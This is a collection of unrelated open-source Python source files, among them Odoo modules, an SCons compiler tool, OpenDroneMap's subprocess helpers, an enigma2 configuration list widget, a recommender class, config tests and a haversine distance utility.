'w', # 0xcc
'x', # 0xcd
'y', # 0xce
'z', # 0xcf
'a', # 0xd0
'b', # 0xd1
'c', # 0xd2
'd', # 0xd3
'e', # 0xd4
'f', # 0xd5
'g', # 0xd6
'h', # 0xd7
'i', # 0xd8
'j', # 0xd9
'k', # 0xda
'l', # 0xdb
'm', # 0xdc
'n', # 0xdd
'o', # 0xde
'p', # 0xdf
'q', # 0xe0
'r', # 0xe1
's', # 0xe2
't', # 0xe3
'u', # 0xe4
'v', # 0xe5
'w', # 0xe6
'x', # 0xe7
'y', # 0xe8
'z', # 0xe9
'0', # 0xea
'[?]', # 0xeb
'[?]', # 0xec
'[?]', # 0xed
'[?]', # 0xee
'[?]', # 0xef
'[?]', # 0xf0
'[?]', # 0xf1
'[?]', # 0xf2
'[?]', # 0xf3
'[?]', # 0xf4
'[?]', # 0xf5
'[?]', # 0xf6
'[?]', # 0xf7
'[?]', # 0xf8
'[?]', # 0xf9
'[?]', # 0xfa
'[?]', # 0xfb
'[?]', # 0xfc
'[?]', # 0xfd
'[?]', # 0xfe
)
|
mikelarre/odoomrp-wip-1
|
refs/heads/8.0
|
mrp_machine_manager/__init__.py
|
18
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# Daniel Campos (danielcampos@avanzosc.es) Date: 08/09/2014
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
from . import models
|
rochoa85/pyMIC
|
refs/heads/master
|
examples/data_map/data_map.py
|
1
|
#!/usr/bin/python
# Copyright (c) 2014, Intel Corporation All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import pyMIC as mic
import numpy as np
device = mic.devices[0]
a = device.zeros((8,8))
|
Coder-Yu/RecQ
|
refs/heads/master
|
baseclass/SocialRecommender.py
|
2
|
from baseclass.IterativeRecommender import IterativeRecommender
from data.social import SocialDAO
from tool import config
from os.path import abspath
class SocialRecommender(IterativeRecommender):
def __init__(self,conf,trainingSet,testSet,relation,fold='[1]'):
super(SocialRecommender, self).__init__(conf,trainingSet,testSet,fold)
self.social = SocialDAO(self.config,relation) #social relations access control
# data clean
cleanList = []
cleanPair = []
for user in self.social.followees:
if not self.data.user.has_key(user):
cleanList.append(user)
for u2 in self.social.followees[user]:
if not self.data.user.has_key(u2):
cleanPair.append((user, u2))
for u in cleanList:
del self.social.followees[u]
for pair in cleanPair:
if self.social.followees.has_key(pair[0]):
del self.social.followees[pair[0]][pair[1]]
cleanList = []
cleanPair = []
for user in self.social.followers:
if not self.data.user.has_key(user):
cleanList.append(user)
for u2 in self.social.followers[user]:
if not self.data.user.has_key(u2):
cleanPair.append((user, u2))
for u in cleanList:
del self.social.followers[u]
for pair in cleanPair:
if self.social.followers.has_key(pair[0]):
del self.social.followers[pair[0]][pair[1]]
idx = []
for n,pair in enumerate(self.social.relation):
if pair[0] not in self.data.user or pair[1] not in self.data.user:
idx.append(n)
for item in reversed(idx):
del self.social.relation[item]
def readConfiguration(self):
super(SocialRecommender, self).readConfiguration()
regular = config.LineConfig(self.config['reg.lambda'])
self.regS = float(regular['-s'])
def printAlgorConfig(self):
super(SocialRecommender, self).printAlgorConfig()
print 'Social dataset:',abspath(self.config['social'])
print 'Social size ','(User count:',len(self.social.user),'Trust statement count:'+str(len(self.social.relation))+')'
print 'Social Regularization parameter: regS %.3f' % (self.regS)
print '=' * 80
|
mattjmcnaughton/sdep
|
refs/heads/master
|
tests/test_config.py
|
1
|
"""
Tests for the `config`.
"""
# pylint: disable=import-error
import os
import shutil
import tempfile
import unittest
import uuid
from collections import namedtuple
import simplejson as json
from mock import patch
from sdep.config import Config, ConfigParseError
class ConfigTestCase(unittest.TestCase):
"""
Test cases for the `Config` class.
"""
# MockDirs is a helper named tuple making it easier to return the temporary
# dirs with which we will mock `current` and `home` dir.
MockDirs = namedtuple("MockDirs", "current home")
def test_load_config_from_file(self):
"""
Test that we properly read in the configuration when it is specified
through a file.
"""
config_file = self._create_config_file()
config = Config(config_file=config_file)
for field in self._all_fields():
self.assertNotEqual(config.get(field), None)
os.remove(config_file)
def test_load_config_from_env(self):
"""
Test that we properly read in the configuration when it is specified in
environment variables.
"""
environ_dict = {key.upper(): value for key, value in
self._config_dict().items()}
with patch.dict(os.environ, environ_dict, clear=True):
config = Config()
for field in self._all_fields():
self.assertNotEqual(config.get(field), None)
def test_find_config_in_curr_dir(self):
"""
Test that we locate the configuration file when it is not explicitly
specified in the command line, but rather located in the curr directory
from which the tests are run.
"""
temp_dirs = self._create_mock_dirs()
with patch('os.getcwd', return_value=temp_dirs.current):
with patch('os.path.expanduser', return_value=temp_dirs.home):
config_in_curr = os.path.join(os.getcwd(),
Config.DEFAULT_CONFIG_FILE_NAME)
self._create_config_file(config_in_curr)
config = Config()
self.assertEqual(config_in_curr, Config.locate_config_file())
for field in self._all_fields():
self.assertNotEqual(config.get(field), None)
for temp_dir in [temp_dirs.current, temp_dirs.home]:
shutil.rmtree(temp_dir, ignore_errors=True)
def test_find_config_in_home_dir(self):
"""
Test that we locate the configuration file when it is not explicitly
specified in the command line, but rather located in the users home
dir.
"""
# @TODO Is there too much overlap between this method and
# `test_find_config_in_home_dir`?
temp_dirs = self._create_mock_dirs()
with patch('os.getcwd', return_value=temp_dirs.current):
with patch('os.path.expanduser', return_value=temp_dirs.home):
config_in_home = os.path.join(os.path.expanduser("~"),
Config.DEFAULT_CONFIG_FILE_NAME)
self._create_config_file(config_in_home)
config = Config()
self.assertEqual(config_in_home, Config.locate_config_file())
for field in self._all_fields():
self.assertNotEqual(config.get(field), None)
for temp_dir in [temp_dirs.current, temp_dirs.home]:
shutil.rmtree(temp_dir, ignore_errors=True)
def test_bad_config(self):
"""
Test loading the configuration from a file with an improperly specified
configuration.
"""
config_file = self._create_bad_config_file()
with self.assertRaises(ConfigParseError):
Config(config_file=config_file)
@classmethod
def _config_dict(cls):
"""
A dictionary of property formatted config.
Returns:
dict: A properly formatted config.
"""
base_dict = {field: str(uuid.uuid4()) for field in cls._all_fields()}
# Remove one of the optional fields so that we can test the default value
# being filled in.
field_to_remove = Config.optional_config_fields()[0]
del base_dict[field_to_remove]
return base_dict
@classmethod
def _create_mock_dirs(cls):
"""
A helper method to create two separate temporary directories which we
will use to mock the current and home directory respectively. Using this
method, in conjunction with mocking, allows us to completely isolate our
test suite from the user's local filesystem.
Returns:
MockDirs: The locations of the mock directories.
"""
temp_current = tempfile.mkdtemp()
temp_home = tempfile.mkdtemp()
return cls.MockDirs(current=temp_current, home=temp_home)
def _create_config_file(self, file_name=None):
"""
A helper method to create a demo working configuration file.
Args:
file_name(Optional[str]): The location for the desired configuration
file.
Returns:
str: The path to the given configuration file.
"""
good_config_dict = self._config_dict()
if file_name is None:
_, file_name = tempfile.mkstemp()
with open(file_name, "w+") as new_config_file:
new_config_file.write(json.dumps(good_config_dict))
return file_name
@staticmethod
def _create_bad_config_file():
"""
A helper method to create a configuration file that will raise an
exception when I try to parse it.
Returns:
str: The path to the given non-working configuration file.
"""
_, file_name = tempfile.mkstemp()
with open(file_name, "w+") as bad_config_file:
bad_config_file.write(json.dumps({}))
return file_name
@staticmethod
def _all_fields():
"""
Helper method to return all configuration fields.
Returns:
list: List of the strings for all configuration fields.
"""
return Config.required_config_fields() + Config.optional_config_fields()
|
spnow/grr
|
refs/heads/master
|
gui/plugins/wizards.py
|
2
|
#!/usr/bin/env python
"""Implementation of an interactive wizard widget."""
from grr.gui import renderers
from grr.gui.plugins import forms
from grr.lib import aff4
from grr.lib import rdfvalue
class WizardRenderer(renderers.TemplateRenderer):
"""This renderer creates a wizard."""
current_page = 0
# WizardPage objects that defined this wizard's behaviour.
title = ""
pages = []
# This will be used for identifying the wizard when publishing the events.
wizard_name = "wizard"
layout_template = renderers.Template("""
<div id="Wizard_{{unique|escape}}" class="Wizard FormData"
data-current='{{this.current_page|escape}}'
data-max_page='{{this.max_pages|escape}}'
>
{% for i, page, page_cls, page_renderer in this.raw_pages %}
<div id="Page_{{i|escape}}" class="WizardPage"
data-renderer="{{page_renderer|escape}}"
style="display: none">
<div class="WizardBar modal-header">
<button type="button" class="close" data-dismiss="modal"
aria-hidden="true">x</button>
<h3>{{this.title|escape}} -
<span class="Description">
{{page_cls.description|escape}}
</span>
</h3>
</div>
<div class="modal-body">
{{page|safe}}
</div>
</div>
{% endfor %}
<div class="modal-footer navbar-inner">
<ul class="nav pull-left">
<div id="Message{{unique}}"/>
<div class="navbar-text" id="footer_message_{{unique}}"></div>
</ul>
<ul class="nav nav pull-right">
<button class="btn Back" style='display: none'>Back</button>
<button class="btn btn-primary Next">Next</button>
<button class="btn btn-primary Finish" style='display: none'
data-dismiss="modal"
>
Finish
</button>
</ul>
</div>
</div>
""")
def Layout(self, request, response):
"""Render the content of the tab or the container tabset."""
self.raw_pages = []
for i, page_cls in enumerate(self.pages):
# Make the page renderers dump all their data to the wizard DOM node.
page_renderer = page_cls(id=self.id)
self.raw_pages.append((i, page_renderer.RawHTML(request),
page_cls, page_cls.__name__))
self.max_pages = len(self.pages) - 1
super(WizardRenderer, self).Layout(request, response)
return self.CallJavascript(response, "WizardRenderer.Layout")
class AFF4AttributeFormRenderer(forms.TypeDescriptorFormRenderer):
"""A renderer for AFF4 attribute forms."""
type = rdfvalue.AFF4Attribute
layout_template = """<div class="control-group">
""" + forms.TypeDescriptorFormRenderer.default_description_view + """
<div class="controls">
<select id="{{this.prefix}}" class="unset"
onchange="grr.forms.inputOnChange(this)"
>
{% for name in this.attributes %}
{% if name %}
<option {% ifequal name this.value %}selected{% endifequal %}
value="{{name|escape}}">
{{name|escape}}
{% ifequal name this.value %} (default){% endifequal %}
</option>
{% endif %}
{% endfor %}
</select>
</div>
</div>
"""
def __init__(self, **kwargs):
super(AFF4AttributeFormRenderer, self).__init__(**kwargs)
self.attributes = ["Unset"]
self.attributes.extend(sorted(aff4.Attribute.NAMES.keys()))
|
engineer0x47/SCONS
|
refs/heads/master
|
engine/SCons/Tool/aixcc.py
|
2
|
"""SCons.Tool.aixcc
Tool-specific initialization for IBM xlc / Visual Age C compiler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/aixcc.py 2014/08/24 12:12:31 garyo"
import os.path
import SCons.Platform.aix
import cc
packages = ['vac.C', 'ibmcxx.cmp']
def get_xlc(env):
xlc = env.get('CC', 'xlc')
return SCons.Platform.aix.get_xlc(env, xlc, packages)
def generate(env):
"""Add Builders and construction variables for xlc / Visual Age
suite to an Environment."""
path, _cc, version = get_xlc(env)
if path and _cc:
_cc = os.path.join(path, _cc)
if 'CC' not in env:
env['CC'] = _cc
cc.generate(env)
if version:
env['CCVERSION'] = version
def exists(env):
path, _cc, version = get_xlc(env)
if path and _cc:
xlc = os.path.join(path, _cc)
if os.path.exists(xlc):
return xlc
return None
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
pierotofy/OpenDroneMap
|
refs/heads/master
|
opendm/system.py
|
2
|
import os
import errno
import json
import datetime
import sys
import subprocess
import string
import signal
from opendm import context
from opendm import log
def get_ccd_widths():
"""Return the CCD Width of the camera listed in the JSON defs file."""
with open(context.ccd_widths_path) as f:
sensor_data = json.loads(f.read())
return dict(zip(map(string.lower, sensor_data.keys()), sensor_data.values()))
running_subprocesses = []
cleanup_callbacks = []
def add_cleanup_callback(func):
global cleanup_callbacks
cleanup_callbacks.append(func)
def remove_cleanup_callback(func):
global cleanup_callbacks
try:
cleanup_callbacks.remove(func)
except ValueError as e:
log.ODM_EXCEPTION("Tried to remove %s from cleanup_callbacks but got: %s" % (str(func), str(e)))
def exit_gracefully():
global running_subprocesses
global cleanup_callbacks
log.ODM_WARNING("Caught TERM/INT signal, attempting to exit gracefully...")
for cb in cleanup_callbacks:
cb()
for sp in running_subprocesses:
log.ODM_WARNING("Sending TERM signal to PID %s..." % sp.pid)
os.killpg(os.getpgid(sp.pid), signal.SIGTERM)
os._exit(1)
def sighandler(signum, frame):
exit_gracefully()
signal.signal(signal.SIGINT, sighandler)
signal.signal(signal.SIGTERM, sighandler)
def run(cmd, env_paths=[context.superbuild_bin_path], env_vars={}, packages_paths=context.python_packages_paths):
"""Run a system command"""
global running_subprocesses
log.ODM_INFO('running %s' % cmd)
env = os.environ.copy()
if len(env_paths) > 0:
env["PATH"] = env["PATH"] + ":" + ":".join(env_paths)
if len(packages_paths) > 0:
env["PYTHONPATH"] = env.get("PYTHONPATH", "") + ":" + ":".join(packages_paths)
for k in env_vars:
env[k] = str(env_vars[k])
p = subprocess.Popen(cmd, shell=True, env=env, preexec_fn=os.setsid)
running_subprocesses.append(p)
retcode = p.wait()
running_subprocesses.remove(p)
if retcode < 0:
raise Exception("Child was terminated by signal {}".format(-retcode))
elif retcode > 0:
raise Exception("Child returned {}".format(retcode))
def now():
"""Return the current time"""
return datetime.datetime.now().strftime('%a %b %d %H:%M:%S %Z %Y')
def now_raw():
return datetime.datetime.now()
def benchmark(start, benchmarking_file, process):
"""
runs a benchmark with a start datetime object
:return: the running time (delta)
"""
# Write to benchmark file
delta = (datetime.datetime.now() - start).total_seconds()
with open(benchmarking_file, 'a') as b:
b.write('%s runtime: %s seconds\n' % (process, delta))
def mkdir_p(path):
"""Make a directory including parent directories.
"""
try:
os.makedirs(path)
except os.error as exc:
if exc.errno != errno.EEXIST or not os.path.isdir(path):
raise
# Python2 shutil.which
def which(program):
path=os.getenv('PATH')
for p in path.split(os.path.pathsep):
p=os.path.join(p,program)
if os.path.exists(p) and os.access(p,os.X_OK):
return p
|
resmo/ansible
|
refs/heads/devel
|
lib/ansible/plugins/doc_fragments/tower.py
|
38
|
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Wayne Witzel III <wayne@riotousliving.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
# Ansible Tower documentation fragment
DOCUMENTATION = r'''
options:
tower_host:
description:
- URL to your Tower instance.
type: str
tower_username:
description:
- Username for your Tower instance.
type: str
tower_password:
description:
- Password for your Tower instance.
type: str
validate_certs:
description:
- Whether to allow insecure connections to Tower.
- If C(no), SSL certificates will not be validated.
- This should only be used on personally controlled sites using self-signed certificates.
type: bool
aliases: [ tower_verify_ssl ]
tower_config_file:
description:
- Path to the Tower config file.
type: path
requirements:
- ansible-tower-cli >= 3.0.2
notes:
- If no I(config_file) is provided we will attempt to use the tower-cli library
defaults to find your Tower host information.
- I(config_file) should contain Tower configuration in the following format
host=hostname
username=username
password=password
'''
|
iDTLabssl/account-financial-tools
|
refs/heads/8.0
|
account_auto_fy_sequence/__openerp__.py
|
18
|
# coding=utf-8
##############################################################################
#
# account_auto_fy_sequence module for Odoo
# Copyright (C) 2014 ACSONE SA/NV (<http://acsone.eu>)
# @author Stéphane Bidoul <stephane.bidoul@acsone.eu>
#
# account_auto_fy_sequence is free software:
# you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License v3 or later
# as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# account_auto_fy_sequence is distributed
# in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License v3 or later for more details.
#
# You should have received a copy of the GNU Affero General Public License
# v3 or later along with this program.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Automatic Fiscal Year Sequences',
'version': '0.1',
'category': 'Accounting',
'author': "ACSONE SA/NV,Odoo Community Association (OCA)",
'website': 'http://acsone.eu',
'depends': ['account'],
'data': [
'views/ir_sequence_view.xml',
],
'installable': True,
'application': False,
'auto_install': False,
'license': 'AGPL-3',
}
|
0sc0d3r/enigma2
|
refs/heads/master
|
lib/python/Components/ConfigList.py
|
13
|
from HTMLComponent import HTMLComponent
from GUIComponent import GUIComponent
from config import KEY_LEFT, KEY_RIGHT, KEY_HOME, KEY_END, KEY_0, KEY_DELETE, KEY_BACKSPACE, KEY_OK, KEY_TOGGLEOW, KEY_ASCII, KEY_TIMEOUT, KEY_NUMBERS, config, configfile, ConfigElement, ConfigText, ConfigPassword
from Components.ActionMap import NumberActionMap, ActionMap
from enigma import eListbox, eListboxPythonConfigContent, eRCInput, eTimer, quitMainloop
from Screens.MessageBox import MessageBox
from Screens.ChoiceBox import ChoiceBox
import skin
class ConfigList(HTMLComponent, GUIComponent, object):
def __init__(self, list, session = None):
GUIComponent.__init__(self)
self.l = eListboxPythonConfigContent()
seperation, = skin.parameters.get("ConfigListSeperator", (350, ))
self.l.setSeperation(seperation)
self.timer = eTimer()
self.list = list
self.onSelectionChanged = [ ]
self.current = None
self.session = session
def execBegin(self):
rcinput = eRCInput.getInstance()
if not config.misc.remotecontrol_text_support.value:
rcinput.setKeyboardMode(rcinput.kmAscii)
else:
rcinput.setKeyboardMode(rcinput.kmNone)
self.timer.callback.append(self.timeout)
def execEnd(self):
rcinput = eRCInput.getInstance()
rcinput.setKeyboardMode(rcinput.kmNone)
self.timer.callback.remove(self.timeout)
def toggle(self):
selection = self.getCurrent()
selection[1].toggle()
self.invalidateCurrent()
def handleKey(self, key):
selection = self.getCurrent()
if selection and selection[1].enabled:
selection[1].handleKey(key)
self.invalidateCurrent()
if key in KEY_NUMBERS:
self.timer.start(1000, 1)
def getCurrent(self):
return self.l.getCurrentSelection()
def getCurrentIndex(self):
return self.l.getCurrentSelectionIndex()
def setCurrentIndex(self, index):
if self.instance is not None:
self.instance.moveSelectionTo(index)
def invalidateCurrent(self):
self.l.invalidateEntry(self.l.getCurrentSelectionIndex())
def invalidate(self, entry):
# when the entry to invalidate does not exist, just ignore the request.
# this eases up conditional setup screens a lot.
if entry in self.__list:
self.l.invalidateEntry(self.__list.index(entry))
GUI_WIDGET = eListbox
def selectionChanged(self):
if isinstance(self.current,tuple) and len(self.current) >= 2:
self.current[1].onDeselect(self.session)
self.current = self.getCurrent()
if isinstance(self.current,tuple) and len(self.current) >= 2:
self.current[1].onSelect(self.session)
else:
return
for x in self.onSelectionChanged:
x()
def postWidgetCreate(self, instance):
instance.selectionChanged.get().append(self.selectionChanged)
instance.setContent(self.l)
self.instance.setWrapAround(True)
def preWidgetRemove(self, instance):
if isinstance(self.current,tuple) and len(self.current) >= 2:
self.current[1].onDeselect(self.session)
instance.selectionChanged.get().remove(self.selectionChanged)
instance.setContent(None)
def setList(self, l):
self.timer.stop()
self.__list = l
self.l.setList(self.__list)
if l is not None:
for x in l:
assert len(x) < 2 or isinstance(x[1], ConfigElement), "entry in ConfigList " + str(x[1]) + " must be a ConfigElement"
def getList(self):
return self.__list
list = property(getList, setList)
def timeout(self):
self.handleKey(KEY_TIMEOUT)
def isChanged(self):
is_changed = False
for x in self.list:
is_changed |= x[1].isChanged()
return is_changed
def pageUp(self):
if self.instance is not None:
self.instance.moveSelection(self.instance.pageUp)
def pageDown(self):
if self.instance is not None:
self.instance.moveSelection(self.instance.pageDown)
def moveUp(self):
if self.instance is not None:
self.instance.moveSelection(self.instance.moveUp)
def moveDown(self):
if self.instance is not None:
self.instance.moveSelection(self.instance.moveDown)
class ConfigListScreen:
def __init__(self, list, session = None, on_change = None):
self["config_actions"] = NumberActionMap(["SetupActions", "InputAsciiActions", "KeyboardInputActions"],
{
"gotAsciiCode": self.keyGotAscii,
"ok": self.keyOK,
"left": self.keyLeft,
"right": self.keyRight,
"home": self.keyHome,
"end": self.keyEnd,
"deleteForward": self.keyDelete,
"deleteBackward": self.keyBackspace,
"toggleOverwrite": self.keyToggleOW,
"pageUp": self.keyPageUp,
"pageDown": self.keyPageDown,
"1": self.keyNumberGlobal,
"2": self.keyNumberGlobal,
"3": self.keyNumberGlobal,
"4": self.keyNumberGlobal,
"5": self.keyNumberGlobal,
"6": self.keyNumberGlobal,
"7": self.keyNumberGlobal,
"8": self.keyNumberGlobal,
"9": self.keyNumberGlobal,
"0": self.keyNumberGlobal,
"file" : self.keyFile
}, -1) # to prevent left/right overriding the listbox
self.onChangedEntry = []
self["VirtualKB"] = ActionMap(["VirtualKeyboardActions"],
{
"showVirtualKeyboard": self.KeyText,
}, -2)
self["VirtualKB"].setEnabled(False)
self["config"] = ConfigList(list, session = session)
if on_change is not None:
self.__changed = on_change
else:
self.__changed = lambda: None
if not self.handleInputHelpers in self["config"].onSelectionChanged:
self["config"].onSelectionChanged.append(self.handleInputHelpers)
def createSummary(self):
self.setup_title = self.getTitle()
from Screens.Setup import SetupSummary
return SetupSummary
def getCurrentEntry(self):
return self["config"].getCurrent() and self["config"].getCurrent()[0] or ""
def getCurrentValue(self):
return self["config"].getCurrent() and str(self["config"].getCurrent()[1].getText()) or ""
def getCurrentDescription(self):
return self["config"].getCurrent() and len(self["config"].getCurrent()) > 2 and self["config"].getCurrent()[2] or ""
def changedEntry(self):
for x in self.onChangedEntry:
x()
def handleInputHelpers(self):
if self["config"].getCurrent() is not None:
try:
if isinstance(self["config"].getCurrent()[1], ConfigText) or isinstance(self["config"].getCurrent()[1], ConfigPassword):
if self.has_key("VKeyIcon"):
self["VirtualKB"].setEnabled(True)
self["VKeyIcon"].boolean = True
if self.has_key("HelpWindow"):
if self["config"].getCurrent()[1].help_window.instance is not None:
helpwindowpos = self["HelpWindow"].getPosition()
from enigma import ePoint
self["config"].getCurrent()[1].help_window.instance.move(ePoint(helpwindowpos[0],helpwindowpos[1]))
else:
if self.has_key("VKeyIcon"):
self["VirtualKB"].setEnabled(False)
self["VKeyIcon"].boolean = False
except:
if self.has_key("VKeyIcon"):
self["VirtualKB"].setEnabled(False)
self["VKeyIcon"].boolean = False
else:
if self.has_key("VKeyIcon"):
self["VirtualKB"].setEnabled(False)
self["VKeyIcon"].boolean = False
def KeyText(self):
from Screens.VirtualKeyBoard import VirtualKeyBoard
self.session.openWithCallback(self.VirtualKeyBoardCallback, VirtualKeyBoard, title = self["config"].getCurrent()[0], text = self["config"].getCurrent()[1].value)
def VirtualKeyBoardCallback(self, callback = None):
if callback is not None and len(callback):
self["config"].getCurrent()[1].setValue(callback)
self["config"].invalidate(self["config"].getCurrent())
def keyOK(self):
self["config"].handleKey(KEY_OK)
def keyLeft(self):
self["config"].handleKey(KEY_LEFT)
self.__changed()
def keyRight(self):
self["config"].handleKey(KEY_RIGHT)
self.__changed()
def keyHome(self):
self["config"].handleKey(KEY_HOME)
self.__changed()
def keyEnd(self):
self["config"].handleKey(KEY_END)
self.__changed()
def keyDelete(self):
self["config"].handleKey(KEY_DELETE)
self.__changed()
def keyBackspace(self):
self["config"].handleKey(KEY_BACKSPACE)
self.__changed()
def keyToggleOW(self):
self["config"].handleKey(KEY_TOGGLEOW)
self.__changed()
def keyGotAscii(self):
self["config"].handleKey(KEY_ASCII)
self.__changed()
def keyNumberGlobal(self, number):
self["config"].handleKey(KEY_0 + number)
self.__changed()
def keyPageDown(self):
self["config"].pageDown()
def keyPageUp(self):
self["config"].pageUp()
def keyFile(self):
selection = self["config"].getCurrent()
if selection and selection[1].enabled and hasattr(selection[1], "description"):
self.session.openWithCallback(self.handleKeyFileCallback, ChoiceBox, selection[0],
list=zip(selection[1].description, selection[1].choices),
selection=selection[1].choices.index(selection[1].value),
keys=[])
def handleKeyFileCallback(self, answer):
if answer:
self["config"].getCurrent()[1].value = answer[1]
self["config"].invalidateCurrent()
self.__changed()
def saveAll(self):
restartgui = False
for x in self["config"].list:
if x[1].isChanged():
if x[0] == _('Show on Display'):
restartgui = True
x[1].save()
configfile.save()
self.doRestartGui(restartgui)
def doRestartGui(self, restart):
if restart:
self.session.openWithCallback(self.ExecuteRestart, MessageBox, _("Restart GUI now?"), MessageBox.TYPE_YESNO)
def ExecuteRestart(self, result):
if result:
quitMainloop(3)
# keySave and keyCancel are just provided in case you need them.
# you have to call them by yourself.
def keySave(self):
self.saveAll()
self.close()
def cancelConfirm(self, result):
if not result:
if self.help_window_was_shown:
self["config"].getCurrent()[1].help_window.show()
return
for x in self["config"].list:
x[1].cancel()
self.close()
def closeMenuList(self, recursive = False):
self.help_window_was_shown = False
try:
self.HideHelp()
except:
pass
if self["config"].isChanged():
self.session.openWithCallback(self.cancelConfirm, MessageBox, _("Really close without saving settings?"), default = False)
else:
try:
self.close(recursive)
except:
self.session.openWithCallback(self.cancelConfirm, MessageBox, _("Really close without saving settings?"))
def keyCancel(self):
self.closeMenuList()
def closeRecursive(self):
self.closeMenuList(True)
|
cderwin/maps
|
refs/heads/master
|
api/util/mapping.py
|
1
|
from math import sin, cos, asin, sqrt, radians
class Point(object):
def __init__(self, lat, lon, unit='deg'):
self.lat = float(lat)
self.lon = float(lon)
self.unit = unit
def __getitem__(self, key):
if key.lower() in ('lat', 'latitude'):
return self.lat
if key.lower() in ('lon', 'longitude'):
return self.lon
raise KeyError('Key not \"lat\" or \"lon\"')
def __setitem__(self, key, value):
if key.lower() in ('lat', 'latitude'):
self.lat = value
if key.lower() in ('lon', 'longitude'):
self.lon = value
raise keyerror('key not \"lat\" or \"lon\"')
def __delitem__(self, key):
if key.lower() in ('lat', 'latitude'):
self.lat = None
if key.lower() in ('lat', 'latitude'):
self.lon = None
raise keyerror('key not \"lat\" or \"lon\"')
def __iter__(self):
return {"lat": self.lat, "lon": self.lon}
@classmethod
def to_radians(cls, point):
if point.unit != 'rad':
lat = radians(point.lat)
lon = radians(point.lon)
return cls(lat, lon, unit='rad')
return point
@classmethod
def to_point(cls, d):
return cls(float(d['lat']), float(d['lon']))
earth_radius = {
'mi': 3959,
'km': 6371
}
def distance(p1, p2, units='mi'):
# Here I implement the Haversine formula: https://en.wikipedia.org/wiki/Haversine_formula
p1 = Point.to_radians(p1 if isinstance(p1, Point) else Point.to_point(p1))
p2 = Point.to_radians(p2 if isinstance(p2, Point) else Point.to_point(p2))
delta_lat = p1.lat - p2.lat
delta_lon = p1.lon - p2.lon
a = sin(delta_lat / 2) ** 2 + cos(p1.lat) * cos(p2.lat) * sin(delta_lon / 2) ** 2
c = 2 * asin(sqrt(a))
r = earth_radius[units] * c
return r
|
nicwest/scudcloud
|
refs/heads/master
|
scudcloud-1.0/lib/resources.py
|
7
|
import os, re
class Resources:
APP_NAME = "ScudCloud Slack_SSB"
SIGNIN_URL = "https://slack.com/signin"
MAINPAGE_URL_RE = re.compile(r'^http[s]://[a-zA-Z0-9_\-]+.slack.com/?$')
MESSAGES_URL_RE = re.compile(r'^http[s]://[a-zA-Z0-9_\-]+.slack.com/messages/.*')
SSO_URL_RE = re.compile(r'^http[s]://[a-zA-Z0-9_\-]+.slack.com/sso/saml/start$')
SERVICES_URL_RE = re.compile(r'^http[s]://[a-zA-Z0-9_\-]+.slack.com/services/.*')
# It's initialized in /scudcloud script
INSTALL_DIR = None
def get_path(filename):
return os.path.join(Resources.INSTALL_DIR, 'resources', filename)
|
